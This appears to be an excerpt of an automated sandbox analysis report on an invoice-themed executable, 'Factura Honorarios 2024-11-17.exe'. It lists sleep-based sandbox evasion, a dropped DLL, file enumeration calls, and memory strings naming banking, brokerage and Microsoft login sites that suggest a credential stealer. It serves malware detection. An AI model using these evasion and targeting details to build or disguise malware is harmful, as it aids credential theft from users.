          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594984Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594875Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594765Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594656Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594546Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeWindow / User API: threadDelayed 8178Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeWindow / User API: threadDelayed 1677Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeAPI coverage: 1.7 %
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep count: 35 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -32281802128991695s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599890s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8124Thread sleep count: 8178 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8124Thread sleep count: 1677 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599781s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599672s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599562s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599453s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599343s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599234s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599125s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599015s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598906s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598797s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598687s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598578s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598469s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598359s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598250s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598140s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598031s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597922s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597812s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597703s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597590s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597437s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597288s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597187s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597078s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -596968s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -596859s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -596750s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -596640s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -596531s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -596422s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -596312s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -596203s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -596093s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -595984s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -595873s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -595765s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -595656s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -595547s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -595437s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -595328s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -595219s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -595094s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -594984s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -594875s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -594765s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -594656s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -594546s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_004065C7 FindFirstFileW,FindClose,3_2_004065C7
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405996
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599672Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599343Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599234Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599125Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599015Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598906Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598797Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598687Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598469Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598359Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598250Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598140Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598031Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597922Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597812Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597703Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597590Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597437Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597288Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597187Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597078Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596968Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596859Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596750Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596640Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596531Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596422Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596312Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596203Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596093Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595984Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595873Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595765Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595656Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595547Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595437Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595328Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595219Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595094Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594984Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594875Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594765Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594656Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594546Jump to behavior
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.000000000598C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000000.00000002.1871926303.00000000006E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeAPI call chain: ExitProcess graph end nodegraph_0-4911
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeAPI call chain: ExitProcess graph end nodegraph_0-4906
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_6FF41B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FF41B63
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeQueries volume information: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
